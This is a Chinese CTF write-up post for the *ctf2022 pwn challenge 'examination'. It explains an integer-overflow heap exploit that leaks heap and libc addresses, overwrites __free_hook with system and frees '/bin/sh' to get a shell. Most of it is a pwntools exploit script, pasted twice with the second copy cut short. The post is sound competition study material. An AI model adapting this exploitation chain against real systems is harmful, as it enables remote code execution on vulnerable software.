-
-
[原创]【*ctf2022】examination
-
发表于: 2022-4-28 19:00
-
何谓成长?成长就是当你还未成熟的时候脑海中复现的担当。学pwn已经半年多了,总不能还称自己是新手了吧
从之前栈题都不大会,遇到堆题基本放弃,从见了musl、go、arm就躲到现在终于主动去学习相关的知识,这就是成长。成长不仅仅意味着能力的提升,还意味着心灵的成熟,对学习的态度的变化。
最后,引用最近的脑海中一直复现的鼬神的一句话:
“你并不弱,只是缺乏信念”
通过整型溢出,在note段向上伪造结构体实现任意地址写,修改一个chunk的size,free它放入unsortedbin leak libc,再通过任意地址写修改free_hook为system,然后free('/bin/sh')实现shell的get
有些绕过的细节其实调调就能出
这题让我认识到了自己shit一样的逆向
逆不动的时候,可以放gdb里调调,拿张草稿纸画画或者在旁边注一下自己好理解的形式比如:
from pwn import *
from LibcSearcher import *
from pwnlib.util.iters import mbruteforce
from hashlib import sha256
import base64
context.log_level='debug'
##context.terminal = ["tmux", "splitw", "-h"]context.arch = 'amd64'
context.os = 'linux'
def proof_of_work(sh):
sh.recvuntil(" == ")
cipher = sh.recvline().strip().decode("utf8")
proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() == cipher, string.ascii_letters + string.digits, length=4, method='fixed')
sh.sendlineafter("input your ????>", proof)
##r = remote("chuj.top", 51904)##proof_of_work(r)libc=ELF('./libc-2.31.so')
r=process('./examination')
def z():
gdb.attach(r)
def cho(num):
r.sendafter("choice>> ",str(num))
def t_add(num):
cho(1)
r.sendlineafter('enter the number of questions: ',str(num))
def t_view(idx,cont,size): ##first_view
cho(3)
r.sendlineafter("which one? > ",str(idx))
bool_=r.recvuntil('comment:')
if bool_ == "enter your comment:":
r.send(cont)
else :
r.sendline(str(size))
r.sendafter("enter your comment:",cont)
def t_delet(idx):
cho(4)
r.sendafter("which student id to choose?",str(idx))
def t_role(num):
cho(5)
r.sendlineafter("role: <0.teacher/1.student>: ",str(num))
def s_changeid(idx):
cho(6)
r.sendlineafter("input your id: ",str(idx))
##prer.sendlineafter("role: <0.teacher/1.student>: ",str(0))
t_add(1) #0
t_add(1) #1
t_view(0,hex(0xdeadbeef),0x300)
t_view(1,hex(0xdeadbeef),0x300)
t_role(1)
cho(3)
t_role(0)
cho(2)
##leak_heap t_role(1)
cho(2)
r.recvuntil("Good Job! Here is your reward! ")
heap=int(r.recvuntil('\n',drop=True),base=16)-0x2a0
log.success('heap:'+hex(heap))
r.sendlineafter("add 1 to wherever you want! addr: ",'00'+str(heap+0x200))
##make_fake_structs_changeid(-15)
cho(4)
pd=p64(heap+0x968)+p64(0xdeadbeef)+p64(heap+0x338)
r.sendlineafter("enter your mode!",pd)
##change chunck(0x55555555f330) size 311 to 621t_role(0)
t_view(-13,p64(0x621),0x300)
##free_2_trew_in_unsortedbint_delet(0)
##change struct 2 leak libct_role(1)
s_changeid(-15)
cho(4)
pd=p64(heap+0x968)+p64(0xdeadbeef)+p64(heap+0x340)
r.sendlineafter("enter your mode!",pd)
s_changeid(-13)
cho(2)
r.recvuntil("here is the review:\n")
libcbase=u64(r.recvuntil('\x7f').ljust(8,'\x00'))-0x1ecbe0
log.success('libcbase:'+hex(libcbase))
##set_libc_fucfree_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
log.success('free_hook:'+hex(free_hook))
log.success('system:'+hex(system))
##change_free_hooks_changeid(-15)
cho(4)
pd=p64(heap+0x968)+p64(0xdeadbeef)+p64(free_hook)
r.sendlineafter("enter your mode!",pd)
t_role(0)
t_view(-13,p64(system),0x300)
##get_shellt_add(1)
t_view(1,'/bin/sh\x00',0x300)
t_delet(1)
r.interactive()from pwn import *
from LibcSearcher import *
from pwnlib.util.iters import mbruteforce
from hashlib import sha256
import base64
context.log_level='debug'
##context.terminal = ["tmux", "splitw", "-h"]context.arch = 'amd64'
context.os = 'linux'
def proof_of_work(sh):
sh.recvuntil(" == ")
cipher = sh.recvline().strip().decode("utf8")
proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() == cipher, string.ascii_letters + string.digits, length=4, method='fixed')
sh.sendlineafter("input your ????>", proof)
##r = remote("chuj.top", 51904)##proof_of_work(r)libc=ELF('./libc-2.31.so')
r=process('./examination')
def z():
gdb.attach(r)
def cho(num):
r.sendafter("choice>> ",str(num))
def t_add(num):
cho(1)
r.sendlineafter('enter the number of questions: ',str(num))
def t_view(idx,cont,size): ##first_view
cho(3)
r.sendlineafter("which one? > ",str(idx))
bool_=r.recvuntil('comment:')
if bool_ == "enter your comment:":
r.send(cont)
else :
r.sendline(str(size))
r.sendafter("enter your comment:",cont)
def t_delet(idx):
cho(4)
r.sendafter("which student id to choose?",str(idx))
def t_role(num):
cho(5)
r.sendlineafter("role: <0.teacher/1.student>: ",str(num))
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
